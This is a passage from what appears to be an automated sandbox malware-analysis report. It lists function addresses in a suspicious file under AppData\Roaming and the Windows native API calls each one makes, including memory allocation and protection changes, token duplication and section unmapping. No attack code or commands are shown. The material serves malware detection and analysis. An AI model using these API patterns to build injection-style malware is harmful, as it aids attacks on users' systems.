                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673E3B7A RtlAllocateHeap,ZwQuerySystemInformationEx,memset,RtlFreeHeap,19_2_673E3B7A
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673B2B7E ZwSetInformationThread,ZwClose,19_2_673B2B7E
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673FAB70 ZwReleaseWorkerFactoryWorker,19_2_673FAB70
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_6747131B RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_6747131B
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673FAB60 ZwReleaseKeyedEvent,19_2_673FAB60
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673E3B48 ZwClose,ZwClose,19_2_673E3B48
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673E4BAD RtlAcquireSRWLockExclusive,memset,ZwTraceControl,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap,19_2_673E4BAD
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673FA3A0 ZwGetCompleteWnfStateSubscription,19_2_673FA3A0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673E939F RtlInitializeCriticalSectionEx,ZwDelayExecution,19_2_673E939F
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673B2B93 TpSetDefaultPoolMaxThreads,ZwDuplicateToken,19_2_673B2B93
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673B23F6 ZwClose,RtlFreeHeap,19_2_673B23F6
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_6747138A memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_6747138A
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F9BF0 ZwAlertThreadByThreadId,19_2_673F9BF0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673CA3E0 RtlFormatCurrentUserKeyPath,ZwQueryInformationToken,RtlLengthSidAsUnicodeString,RtlAppendUnicodeToString,RtlConvertSidToUnicodeString,RtlFreeUnicodeString,19_2_673CA3E0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67471BA8 RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_67471BA8
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67489BBE RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_67489BBE
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673B2BC2 ZwOpenThreadToken,ZwSetInformationThread,ZwClose,19_2_673B2BC2
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67488BB6 RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_67488BB6
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673B8239 RtlInitUnicodeStringEx,ZwQueryValueKey,RtlInitUnicodeStringEx,RtlPrefixUnicodeString,ZwEnumerateKey,ZwOpenKey,RtlInitUnicodeStringEx,ZwQueryValueKey,RtlFreeHeap,ZwClose,RtlAllocateHeap,RtlCompareUnicodeString,ZwClose,RtlFreeHeap,ZwClose,19_2_673B8239
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67441242 ZwUnmapViewOfSection,ZwClose,ZwClose,ZwClose,ZwClose,ZwClose,19_2_67441242
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673EB230 EtwEventWrite,ZwTraceEvent,RtlNtStatusToDosError,19_2_673EB230
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F9A30 ZwTerminateThread,19_2_673F9A30
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673DA229 ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwQueryVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlFillMemoryUlong,DbgPrint,DbgPrint,DbgPrint,19_2_673DA229
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673B4A20 RtlGetCurrentServiceSessionId,RtlFreeHeap,ZwClose,RtlReleaseActivationContext,LdrUnloadDll,19_2_673B4A20
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67488A62 RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_67488A62
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673B5210 RtlGetCurrentDirectory_U,memcpy,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,19_2_673B5210
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F9A00 ZwProtectVirtualMemory,19_2_673F9A00
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67488214 RtlAcquireSRWLockExclusive,ZwSetInformationWorkerFactory,RtlReleaseSRWLockExclusive,19_2_67488214
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67444A28 ZwOpenKey,DbgPrintEx,ZwQueryValueKey,DbgPrintEx,DbgPrintEx,memcpy,ZwClose,19_2_67444A28
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673B9240 ZwClose,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlAcquireSRWLockExclusive,RtlFreeHeap,19_2_673B9240
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673EE2BB ZwWaitForAlertByThreadId,19_2_673EE2BB
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F9AB0 ZwWaitForMultipleObjects,19_2_673F9AB0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67441AD6 ZwFreeVirtualMemory,19_2_67441AD6
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67488ADD RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_67488ADD
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673B1AA0 RtlAllocateHandle,RtlReAllocateHeap,ZwAllocateVirtualMemory,ZwAllocateVirtualMemory,RtlAllocateHeap,19_2_673B1AA0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673B52A5 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwFsControlFile,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,19_2_673B52A5
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673E5AA0 TpSetPoolMaxThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,19_2_673E5AA0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673B429E RtlInitUnicodeString,ZwClose,LdrQueryImageFileKeyOption,19_2_673B429E
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673ED294 ZwQueryAttributesFile,RtlFreeHeap,ZwClose,RtlFreeHeap,19_2_673ED294
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673FAA90 ZwQuerySystemInformationEx,19_2_673FAA90
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673EDA88 RtlAcquireSRWLockExclusive,RtlImageNtHeader,RtlAllocateHeap,ZwUnmapViewOfSection,ZwClose,RtlReAllocateHeap,19_2_673EDA88
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673D2280 RtlAcquireSRWLockExclusive,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,ZwTerminateProcess,19_2_673D2280
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673FB280 ZwWow64DebuggerCall,19_2_673FB280
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F9AE0 ZwTraceEvent,19_2_673F9AE0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673FAAE0 ZwRaiseException,19_2_673FAAE0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673DFAD0 RtlAcquireSRWLockShared,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,ZwTerminateProcess,19_2_673DFAD0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673FAAC0 ZwQueryWnfStateNameInformation,19_2_673FAAC0
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673FA130 ZwCreateWaitCompletionPacket,19_2_673FA130
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_673F9920 ZwDuplicateToken,19_2_673F9920
                      Source: C:\Users\user\AppData\Roaming\bijvfaaCode function: 19_2_67488966 RtlGetCurrentServiceSessionId,ZwTraceEvent,19_2_67488966
                      Source: C:\Users\user\AppDat